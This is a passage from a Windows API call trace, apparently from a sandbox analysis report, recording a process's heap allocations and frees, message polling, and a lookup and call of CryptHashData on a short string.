lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0148.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0148.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0148.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0148.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0148.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0148.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0148.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0148.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0148.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0148.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54db8 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0148.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0148.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0148.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0148.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54de8 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0148.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0148.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0148.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0148.658] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0148.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0148.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0148.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0148.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0148.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0148.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0148.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0148.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0148.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0148.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0148.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0148.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0148.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0148.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50bf0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0148.661] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0148.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0148.662] CryptHashData (hHash=0xa87090, pbData=0x2e54e38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0148.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0148.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0148.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0148.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0148.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0148.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0148.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0148.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0148.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0148.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0148.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0148.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0148.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0148.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0148.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0148.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0148.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0148.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0148.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0148.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0148.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0148.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0148.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 